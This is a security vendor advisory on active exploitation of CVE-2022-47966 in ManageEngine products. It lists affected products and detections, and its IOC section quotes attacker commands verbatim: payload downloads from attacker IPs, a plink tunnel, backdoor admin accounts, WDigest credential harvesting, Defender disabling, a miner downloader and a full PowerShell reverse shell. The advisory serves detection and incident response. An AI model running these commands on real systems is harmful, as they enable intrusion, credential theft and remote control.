Last updated at Wed, 25 Jan 2023 20:23:13 GMT
Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.
Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-47966, a pre-authentication remote code execution (RCE) vulnerability impacting at least 24 on-premise ManageEngine products. CVE-2022-47966 stems from a vulnerable third-party dependency on Apache Santuario. Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Patches were released in October and November of 2022; the exact timing of fixed version releases varies by product.
Rapid7 has a full technical analysis of CVE-2022-47966 in AttackerKB. Our vulnerability research team found during testing that some products may be more exploitable than others: ServiceDesk Plus, for instance, is easily exploitable with public proof-of-concept code, but ADSelfService Plus requires an attacker to obtain two additional pieces of information and modify the PoC for successful exploitation.
Organizations using any of the affected products listed in ManageEngine’s advisory should update immediately and review unpatched systems for signs of compromise, as exploit code is publicly available and exploitation has already begun.
Affected products
See ManageEngine’s advisory for CVE-2022-47966 for updated product and version information.
At the time of publication, the vulnerable products are subject to certain caveats according to Zoho’s advisory.
The following list of vulnerable products is subject to the caveats below:
* Vulnerable if configured SAML-based SSO and it is currently active.
** Vulnerable if configured SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.
- Access Manager Plus*
- Active Directory 360**
- ADAudit Plus**
- ADManager Plus**
- ADSelfService Plus**
- Analytics Plus*
- Application Control Plus*
- Asset Explorer**
- Browser Security Plus*
- Device Control Plus*
- Endpoint Central*
- Endpoint Central MSP*
- Endpoint DLP*
- Key Manager Plus*
- OS Deployer*
- PAM 360*
- Password Manager Pro*
- Patch Manager Plus*
- Remote Access Plus*
- Remote Monitoring and Management (RMM)*
- ServiceDesk Plus**
- ServiceDesk Plus MSP**
- SupportCenter Plus**
- Vulnerability Manager Plus*
Background
ManageEngine released patches for these products in October and November of 2022.
Rapid7 observed exploitation across organizations as early as January 17, 2023 (UTC).
Security firm Horizon3 released technical information with a proof of concept (PoC) on January 19, 2023.
Rapid7 customers
InsightVM & Nexpose customers: Remote vulnerability checks for ManageEngine ServiceDesk Plus and ManageEngine ADSelfService Plus are available as of the January 19 content release. Remote vulnerability checks for SupportCenter Plus, Key Manager Plus, Asset Explorer, Access Manager Plus, PAM 360, and Password Manager Pro are available as of the January 20 content release. Our researchers are continuing to evaluate the feasibility of adding vulnerability checks for other affected products.
InsightIDR & Managed Detection & Response customers: The previously existing detections have been triggering post exploitation:
- Attacker Technique - Plink Redirecting RDP
- Attacker Technique - Renamed Plink
- Attacker Tool - PowerShell -noni -ep -nop Flags
- Suspicious Process - PowerShell System.Net.Sockets.TcpClient
- Suspicious Process - Zoho ManageEngine Spawns Child
- Suspicious Process - Powershell Invoke-WebRequest
Velociraptor Users: Rapid7 has created a Velociraptor artifact that can be used to hunt for this activity on ManageEngine assets in your environment.
Rapid7 observed IOCs
Based on attacks Rapid7 has observed in the wild, a typical exploitation of CVE-2022-47966 begins with the SAML response being rejected, followed by an invalid response error where the response is a Base64 encoded XML document that contains a malicious payload.
Example of exploitation:
[15:23:40:403]|[01-17-2023]|[com.manageengine.mdh.MDHFilter]|[INFO]|[43]: SamlMobile | isMobileNative: false requestFrom: null|
[15:24:00:283]|[01-17-2023]|[SYSERR]|[INFO]|[53]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|
[15:24:00:283]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.Auth.validateResponse(Auth.java:448)|
[15:24:00:283]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.Auth.processResponse(Auth.java:196)|
[15:24:00:283]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.processRequest(SamlResponseServelt.java:57)|
[15:24:00:283]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.doPost(SamlResponseServelt.java:246)|
[15:24:00:285]|[01-17-2023]|[com.adventnet.authentication.saml.Auth]|[SEVERE]|[53]: processResponse error. invalid_response --> PHNhbWxwOlJlc3BvbnNlIFZlcnNpb249IjIuMCIgSUQ9ImhyWXQ2OTgxOHI1SHkwWWJyM1NMNnUuVUYyMi[TRUNCTATED]
[15:24:00:287]|[01-17-2023]|[com.adventnet.authentication.saml.Auth]|[WARNING]|[53]: Exception occurred while retrieving user name from the SamlResonse|
[15:24:00:287]|[01-17-2023]|[com.adventnet.authentication.saml.SamlResponseServelt]|[WARNING]|[53]: Authentication failed for user :: null|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.processRequest(SamlResponseServelt.java:128)|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.doPost(SamlResponseServelt.java:246)|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: Caused by: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.Auth.validateResponse(Auth.java:448)|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.Auth.processResponse(Auth.java:196)|
[15:24:00:288]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.processRequest(SamlResponseServelt.java:57)|
[15:24:00:289]|[01-17-2023]|[com.adventnet.servicedesk.authentication.NTLMV2Filter]|[INFO]|[53]: Exception during NTLMV2 doFilter trace started::message::Exception during SAML authenticationjavax.servlet.ServletException: Exception occurred while processing response::cause::null|
[15:24:00:289]|[01-17-2023]|[SYSERR]|[INFO]|[53]: javax.servlet.ServletException: Exception during SAML authenticationjavax.servlet.ServletException: Exception occurred while processing response|
[15:24:00:289]|[01-17-2023]|[SYSERR]|[INFO]|[53]: at com.adventnet.authentication.saml.SamlResponseServelt.doPost(SamlResponseServelt.java:249)|
- In the first instance of exploitation, we identified that the payload in the malicious XML document executed a PowerShell command that piped a Base64 encoded webshell into ../webapps/ROOT/scripts/ae_commons.js, where it was subsequently decoded into ../custom/login/commons.jsp.
- Following the webshell creation on the target machine, the attacker executed local enumeration commands and subsequently downloaded a renamed plink from the attacker infrastructure creating an open tunnel for persistent access. The attacker proceeded to add an account named guest to the local administrators group.
- Next, the attacker modified the Wdigest registry key to force the system to store passwords in plaintext as a method of further credential harvesting.
- The attackers executed all commands as SYSTEM, originating from a windows machine with the hostname of WIN-OQJUIMC71B6. The host WIN-OQJUIMC71B6 has been tied to ransomware activity in the past.
- Commands executed by the attacker:
powershell whomai
powershell whoami
powershell net user
powershell query session
powershell net user [REDACTED USER] /domain
powershell Invoke-WebRequest http://172.93.193.64/file.exe -OutFile c:\windows\temp\ekern.exe
powershell echo y
C:\windows\temp\ekern.exe -ssh -P 443 -l admin -pw Er#@fffdrhhsfg56nb@ffvd -R 172.93.193.64:40700:127.0.0.1:3389 172.93.193.64
powershell net user
powershell net user Administrator
powershell net user guest /active:yes
powershell net user guest Linux.110.110@123
powershell net localgroup administrators guest /add
powershell net user guest
powershell tasklist
powershell net user Administrator
powershell net user guest
powershell net user Administrator
powershell net user Administrator Linux.110.110@123
powershell net user [REDACTED USER]
powershell net user [REDACTED USER] /domain
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
arp -a
powershell net user [REDACTED USER] /domain
powershell net group 'domain admins' /domain
C:\Users\Administrator\to.exe 468
C:\Users\Administrator\to.exe 7300
In addition, Rapid7 has observed numerous additional exploitations of CVE-2022-47966 by identifying malicious processes with the parent process of ManageEngine. These commands did not involve the creation of a webshell but are typical post-exploitation activities. We have included these as Mitre attack techniques:
T1562.001 Defense Evasion: Disable \ Modify tools (Disable Defender realtime)
powershell -windowstyle hidden set-mppreference -disablerealtimemonitoring
set-mppreference -exclusionpath c:\users\public
Set-MpPreference -DisableRealtimeMonitoring $true Add-MpPreference -ExclusionPath "C:/Users/Administrator/" Start-Process C:\\Users\\Administrator\\enc.exe
T1105 Ingress Tool Transfer: Powershell cmdlet Invoke-WebRequest(IWR) used to download additional remote access tools
invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe
curl http://146[.]4.21.94/tmp/tmp/log.php
powershell iex(New-Object Net.WebClient).DownloadString('http://163[.]123.142.210/bypass.ps1') (Agent Tesla download cradle)
T1572 Protocol Tunneling: Chisel, Golang implementation of protocol tunneling tool - similar to Plink. Tunneling over socks proxy with Chisel.
c:\users\public\svhost.exe client 111.68.7[.]122:8080 R:0.0.0.0:43566:socks
T1136.001 Create Account: Local account
net user superadmin superadmin123! /add net localgroup administrators superadmin /add net localgroup "Remote Desktop Users" superadmin /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=yes
T1496 Resource Hijacking: Coinminer installation (Monero)
$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://50[.]19.48.59:82/me.bat', $tempfile); & $tempfile ; Remove-Item -Force $tempfile
T1059.001 Command and Scripting Interpreter: PowerShell (PowerShell reverse shell)
$client = $stream = $buffer = $writer = $data = $result = $null; try { $client = New-Object Net.Sockets.TcpClient("45[.]61.136.188", 443); $stream = $client.GetStream(); $buffer = New-Object Byte[] 1024; $encoding = New-Object Text.UTF8Encoding; $writer = New-Object IO.StreamWriter($stream, [Text.Encoding]::UTF8, 1024); $writer.AutoFlush = $true; $bytes = 0; do { $writer.Write("PS>"); do { $bytes = $stream.Read($buffer, 0, $buffer.Length); if ($bytes -gt 0) {$data += $encoding.GetString($buffer, 0, $bytes);} } while ($stream.DataAvailable); if ($bytes -gt 0) {$data = $data.Trim(); if ($data.Length -gt 0) {try { $result = Invoke-Expression -Command $data 2>&1 | Out-String; } catch { $result = $_.Exception | Out-String;} Clear-Variable -Name "data"; if ($result.Length -gt 0) {$writer.Write($result);Clear-Variable -Name "result";}}}} while ($bytes -gt 0); } catch { Write-Host $_.Exception.InnerException.Message; } finally { if ($writer -ne $null) { $writer.Close(); $writer.Dispose(); Clear-Variable -Name "writer"; } if ($stream -ne $null) { $stream.Close(); $stream.Dispose(); Clear-Variable -Name "stream"; } if ($client -ne $null) { $client.Close(); $client.Dispose(); Clear-Variable -Name "client"; } if ($buffer -ne $null) { $buffer.Clear(); Clear-Variable -Name "buffer"; } if ($result -ne $null) { Clear-Variable -Name "result"; } if ($data -ne $null) { Clear-Variable -Name "data"; } [GC]::Collect(); }
Rapid7 aggregated network IOCs:
- 111.68.7[.]122
- 50.19.48[.]59
- 172.93.193[.]64
- 149.28.193[.]216
- 185.106.94[.]146
- 163.123.142[.]210
- 146.4.21[.]94
- 45.61.136[.]188
- 138.68.61[.]82
Updates
01/19/2023 19:06 GMT: Added Rapid7 observed IOCs
01/19/2023 20:35 GMT: Updated Rapid7 observed IOCs
01/19/2023 20:55 GMT: Updated InsightIDR detections
01/20/2023 14:26 GMT: Added Velociraptor artifact
01/20/2023 15:11 GMT: Added MITRE ATT&CK information, Updated InsightVM & Nexpose content information
01/20/2023 21:40 GMT: Updated InsightVM & Nexpose content information
1/20/2023 23:45 GMT: Updated with findings from full root cause analysis in AttackerKB
1/25/2023 20:10 GMT: Updated Rapid7 observed IOCs